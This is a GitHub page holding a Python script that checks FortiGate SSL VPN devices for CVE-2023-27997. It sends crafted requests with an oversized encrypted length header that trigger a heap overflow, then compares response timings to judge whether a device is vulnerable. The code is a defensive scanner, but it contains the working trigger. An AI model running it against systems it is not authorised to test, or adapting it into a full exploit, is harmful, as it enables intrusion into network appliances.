-
Notifications
You must be signed in to change notification settings - Fork 23
/
CVE-2023-27997-check.py
93 lines (71 loc) · 3.07 KB
/
CVE-2023-27997-check.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#!/usr/bin/env python3
import requests, struct, hashlib, sys, os, re
from urllib3.exceptions import InsecureRequestWarning
from scipy.stats import ttest_ind
import numpy as np
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Default 400 requests with valid length and 400 requests with too high of a length
# In most cases, we should break out of the loop long before we hit this number.
REQUESTS_PER_GROUP = 400
def gen_enc_hdr(salt, l):
magic = b"GCC is the GNU Compiler Collection."
ks = hashlib.md5(salt + b"00bfbfbf" + magic).digest()
length = struct.pack("<H", l)
return "00bfbfbf{:02x}{:02x}".format(length[0] ^ ks[0], length[1] ^ ks[1])
def make_req(session, baseurl, salt, allocsize, reqsize):
payload = gen_enc_hdr(salt, reqsize) + "41" * allocsize
payload = "ajax=1&username=test&realm=&enc=" + payload
r = session.post(
baseurl + "/remote/hostcheck_validate",
headers={"content-type": "application/x-www-form-urlencoded"},
verify=False,
data=payload,
)
return r
def reject_outliers(data):
# This rejects ~25% of responses, but gives us much better sensitivity by filtering out random spikes in latency
q3 = np.quantile(data, 0.75)
return list(filter(lambda x: x <= q3, data))
def check_stats(regular, overflow):
overflow = reject_outliers(overflow)
regular = reject_outliers(regular)
t_stat = ttest_ind(overflow, regular, equal_var=False)
return len(overflow), len(regular), t_stat
def check_target(baseurl):
r = requests.get(baseurl + "/remote/info", verify=False)
reg = re.compile("salt='([0-9a-f]{8})'")
matches = reg.findall(r.text)
if len(matches) != 1:
return "ERROR: not FortiGate ssl vpn?"
salt = matches[0].encode()
# allocations of size 0xe000+1-0x10000 are all in the same size class
# we leave a 2KiB gap after our allocation but before the next chunk, so vulnerable devices will only corrupt unused memory
alloc_size = 0xF800
overflow = []
regular = []
s = requests.Session()
for i in range(REQUESTS_PER_GROUP):
r1 = make_req(s, baseurl, salt, alloc_size, alloc_size + 0xF0)
overflow.append(r1.elapsed.microseconds)
r2 = make_req(s, baseurl, salt, alloc_size, alloc_size // 2)
regular.append(r2.elapsed.microseconds)
if i > 20 and i % 10 == 0:
nr, no, t = check_stats(regular, overflow)
if nr > 20 and no > 20 and t.pvalue < 0.001:
break
_, _, t_stat = check_stats(regular, overflow)
if t_stat.pvalue > 0.001 or (-2 < t_stat.statistic < 2):
print("WARNING: Low confidence results.")
if t_stat.statistic < -0.5:
return "Patched"
elif t_stat.statistic > 0.5:
return "Vulnerable"
else:
return "Unknown"
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Usage: detect {} <IP> <PORT>".format(os.path.basename(__file__)))
exit(0)
baseurl = "https://{}:{}".format(sys.argv[1], sys.argv[2])
print("Checking " + baseurl)
print(check_target(baseurl))